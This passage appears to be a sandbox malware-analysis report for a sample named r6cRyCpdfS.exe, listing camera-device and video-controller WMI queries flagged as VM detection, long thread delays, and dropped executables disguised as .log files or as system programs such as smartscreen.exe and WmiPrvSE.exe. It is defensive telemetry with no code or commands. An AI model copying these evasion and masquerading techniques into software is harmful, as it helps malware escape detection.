                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: DC0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: 1A9B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: 1A720000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: 980000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: 1A620000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMemory allocated: 30E0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMemory allocated: 1B2B0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMemory allocated: 13F0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMemory allocated: 1B1E0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeMemory allocated: 18F0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeMemory allocated: 1B470000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeMemory allocated: 1350000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                              Source: C:\Recovery\WmiPrvSE.exeMemory allocated: 1610000 memory reserve | memory write watch
                              Source: C:\Recovery\WmiPrvSE.exeMemory allocated: 1B300000 memory reserve | memory write watch
                              Source: C:\Recovery\WmiPrvSE.exeMemory allocated: 1580000 memory reserve | memory write watch
                              Source: C:\Recovery\WmiPrvSE.exeMemory allocated: 1B300000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMemory allocated: 15E0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMemory allocated: 1B410000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeMemory allocated: 1990000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeMemory allocated: 1B580000 memory reserve | memory write watch
                              Source: C:\Recovery\WmiPrvSE.exeMemory allocated: CA0000 memory reserve | memory write watch
                              Source: C:\Recovery\WmiPrvSE.exeMemory allocated: 1A710000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMemory allocated: 16F0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMemory allocated: 1B160000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: BD0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: 1A5C0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 600000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 599890
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 599672
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 598953
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 598578
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 3600000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 597485
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 597078
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 596922
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 596531
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 596328
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 595735
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 595493
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 595281
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 594594
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 594153
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593969
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593828
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593485
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593266
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 593016
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 300000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 592750
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 592453
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 592078
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 591188
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 590969
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 590735
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 590344
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 590047
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 589719
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 589375
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 589110
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 588328
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 588031
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 587750
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 587516
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 587172
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 586875
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 586594
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 586355
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 586047
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 585141
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584882
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584687
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584424
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584245
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584139
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 584026
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583906
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583719
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583514
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583367
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 583141
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582719
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582526
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582384
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582247
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582105
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581997
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581886
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581747
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581640
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581510
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581404
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581278
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581144
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580891
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580766
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580641
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580528
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580417
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580244
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579683
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579546
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579434
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579311
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579201
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579094
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 578984
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 578874
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 578766
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWindow / User API: threadDelayed 8437
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWindow / User API: threadDelayed 938
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JVTxIHOe.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\LVAfadhu.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\haYbFIoh.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\AaEpKsEu.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\wBUQRRyD.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\jaFJWeGx.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\dzjCIUvL.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\CdKPGOIP.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\rrkZaPzN.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\DGaPaFaK.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\GzqyMBLI.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\XTzlBYHG.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\PLrVhZhn.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\aEgmRURW.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\SChMoWhg.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TmfudOZJ.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\mNqahFDV.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\uOkAGqBf.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\vCoIsDxd.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ceWKxdyo.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\ROdEDIli.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LGyNPUZX.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zujzDNjC.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\fkPTPiGE.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\yEaqNnCZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\UBOVNjiG.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\oVHaeKwr.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\cVzKNqfr.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\akTuGdUy.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDropped PE file which has not been started: C:\Users\user\Desktop\mVZsMoeb.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeDropped PE file which has not been started: C:\Users\user\Desktop\dQqVXqpO.logJump to dropped file
